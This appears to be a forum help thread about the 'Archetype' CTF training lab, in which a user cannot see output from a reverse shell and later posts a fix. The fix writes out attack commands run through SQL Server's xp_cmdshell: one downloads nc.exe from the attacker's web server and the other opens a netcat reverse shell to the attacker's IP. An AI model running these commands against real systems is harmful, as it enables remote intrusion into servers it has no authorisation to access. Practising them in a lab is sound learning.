Archtype CTF netcat issue #help please

Hi guys i’m a new user
started to Archtype CTF from StartingPoint
arrived to update the shell.ps1 on Sqldb
while i’m listening with nc on the terminal, when connection is enstablished typing any command all the result i can have is a simple #
i tought the problem could be that i can’t see shell’s outputs, i followed the walktrough’ pdf and tried using the same commands but at the end i obtain the shell without output
connect to [XX:XX:XX:XX] from UNKONOWN…



Thank you to all will give me a little help! :slight_smile:
screen — ImgBB : screen link

For who have this problem, I solved after day using nc.exe to connect Archtype machine to my kali
Tought there was a problem on the rev shell that could not allow me to see outputs
Then downloaded nc.exe from github and provided to get it on the machine from sqldb using command:
xp_cmdshell “powershell wget -UseBasicParsing http://10.10.xx.xx:8000/nc.exe -OutFile %temp%/nc.exe” # obviously nc.exe was hosted by python server
then i ran nc from sqldb to my ip:port using command:
xp_cmdshell “%temp%/nc.exe -nv 10.10.xx.xx 1234 -e cmd.exe” # while was listening on 1234 by nc on my kali terminal
and here we are obtained interactive shell
Go priv escalation

Hope could help someone in the same situation! :slight_smile: